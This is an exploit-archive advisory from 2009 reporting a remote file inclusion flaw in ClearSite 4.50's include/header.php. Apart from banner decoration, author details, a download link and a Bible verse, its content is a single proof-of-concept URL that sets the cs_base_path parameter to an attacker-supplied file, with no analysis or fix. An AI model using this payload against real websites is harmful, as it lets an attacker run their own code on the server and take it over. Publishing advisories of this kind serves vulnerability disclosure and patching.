id: 5786
date: 09/17/2009
title: ClearSite 4.50 (cs_base_path) Remote File Inclusion Vulnerability
author: EA Ngel
cves: 

=================================================================
ClearSite 4.50 (cs_base_path) Remote File Inclusion Vulnerability
=================================================================


[#]Network Management/Inventory System [header.php] Remote File Include Vulnerability[#]
                 ----------------------------------------------------------------------------------



[@]======================================================================================================[@]
[+] Author	 	 : EA Ngel									 [+]
[+] Location    	 : Republik Rakyat Indonesia [RRI]						 [+]					 [+]
[+] Download Script	 : http://sourceforge.net/projects/clearsite/					 [+]	
[@]======================================================================================================[@]



[@]======================================================================================================[@]
[+] 3rr0r Bu9		 : - header.php									 [+]								
[@]======================================================================================================[@]



[@]======================================================================================================[@]
[+] 3xpl0it		 : http://127.0.0.1/include/header.php?cs_base_path=[thanks.txt?]		 [+]
[@]======================================================================================================[@]



[@]======================================================================================================[@]
[+] Note		 : Anxiety in a man's heart weighs it down, but an encouraging word makes it glad[+]
[+]                        (Proverbs 12:25)                                                              [+]             
[@]======================================================================================================[@]

			 	           * GOD BLESS ALL *




#  0day.today [2023-03-21]  #